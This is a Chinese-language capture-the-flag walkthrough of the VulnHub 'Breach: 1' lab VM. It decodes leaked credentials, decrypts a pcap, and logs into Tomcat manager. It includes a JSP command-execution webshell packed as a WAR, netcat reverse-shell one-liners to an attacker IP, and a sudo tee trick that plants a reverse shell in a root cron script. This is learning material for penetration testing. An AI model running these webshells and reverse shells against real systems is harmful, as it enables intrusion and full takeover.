vulnhub - BREACH: 1
描述
作为多部分系列中的第一部分,Breach 1.0 旨在成为初学者到中级的 boot2root/CTF 挑战。解决将需要可靠的信息收集和持久性相结合。不遗余力。
VM 配置了静态 IP 地址 (192.168.110.140),因此您需要将主机专用适配器配置到此子网。
非常感谢 knightmare 和 rastamouse 的测试和反馈。
感谢 g0tmi1k 维护 #vulnhub 并主持我的第一个挑战。
如果您遇到任何问题,您可以在 Twitter 上找到我:https://twitter.com/mrb3n813 或在 #vulnhub 中的 IRC 上。
期待撰写文章,尤其是任何意外的本地/根路径。
环境搭建
修改此处为
修改为主机模式,kali也要改
重启后出现对应网卡配置即为设置成功
信息收集 - 80端口
nmap扫描端口,发现端口全开,还是优先关注常用的端口
访问web页面,查看源码
<!DOCTYPE html><html>
<head>
<title>Welcome to Breach 1.0</title>
</head><body bgcolor="#000000"><font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p> <p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach.
However, their own work ethics and the mess left behind may be the company's downfall.</p><center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg"
width=500 height=500> </a></center><!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo -----></body>
</html>
得到注释,解两次base64得到一个用户密码
pgibbons:damnitfeel$goodtobeagang$ta
还有一个链接指向192.168.110.140/initech.html,源码有注释
<!--I'm sitting on a beach reading your email! -->
点击进入Employee portal会跳转到http://192.168.110.140/impresscms/user.php
指纹探测
有登录框,尝试登入。用刚才得到的用户密码
登录成功后发现有三封邮件
来自 ImpressCMS Admin
Posting sensitive content Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill
来自Michael Bolton
IDS/IPS systemHey Peter,I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!-Michael
来自ImpressCMS Admin
FWD: Thank you for your purchase of Super Secret Cert Pro!Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- From: registrar@penetrode.com Sent: 02 June 2016 16:16 To: bob@initech.com; admin@breach.local Subject: Thank you for your purchase of Super Secret Cert Pro! Please find attached your new SSL certificate. Do not share this with anyone!
这封提到了192.168.110.140/.keystore,结合后文提到的SSL certificate应该就是SSL证书
但是还没有地方可以导入使用,利用搜索框,输入SSL试试
SSL implementation test captureTeam - I have uploaded a pcap file of our red team's re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I'm going fishing for the next 2 days and will not have access to email or phone.
果然搜到了一封邮件,告诉我们有一个流量包,别名、存储密码和密钥都设置为“tomcat”
列出名为 "keystore" 的密钥库中存储的证书和密钥
keytool -list -keystore keystore
keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
生成符合要求的证书,打开流量包
编辑->首选项->Protocols->TLS->RSA keys list 单击key file 添加
看了一下各个流的信息
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
这里拿到了一个用户密码
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
解base64得到tomcat:Tt\5D8F(#!*u=G)4m7zB,应该也是一个用户密码
还有一个可疑网页https://192.168.110.140:8443/_M@nag3Me/html,要开代理抓包访问
信息收集 - 8443端口
访问时要求输入用户密码
tomcat:Tt\5D8F(#!*u=G)4m7zB登录成功
指纹探测
看到一个文件上传点,可传war包
将shell.jsp打包成war包
<%
Runtime.getRuntime().exec(request.getParameter("shell"));
%>
shell.jsp单独放置一个目录,命令行下进入当前目录
jar -cvf Login.war shell.jsp
访问文件位置https://192.168.110.140:8443/shell/shell.jsp,有定时任务删文件,所以选择反弹shell
nc -v 192.168.110.128 8888 -e /bin/bash
开启交互
python -c 'import pty;pty.spawn("/bin/sh")'
查看/etc/passwd,关注以下两个用户
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
再寻找一下可疑文件,在/var/www/5446下有两个php文件
查看得到了mysql的用户密码
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
直接登入
mysql -u root -p
查表
拿到了用户milton的密码,md5破解
得到密码 thelaststraw
登入milton却发现无法提权
$ su milton
su milton
Password: thelaststrawmilton@Breach:/var/www/5446$ sudo -l
sudo -l
[sudo] password for milton: thelaststrawSorry, user milton may not run sudo on Breach.
到处找痕迹。。
发现两张图片的权限有区别,下载到本机
用exiftool查看
在bill.png果然拿到了信息,尝试后发现是用户blumbergh的密码
登录查看可用提权方式
找到相应提权命令
那再次反弹shell
echo nc -v 192.168.110.128 7777 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
注意!这里不要自己立刻运行,这样会提权失败需要等它自己触发
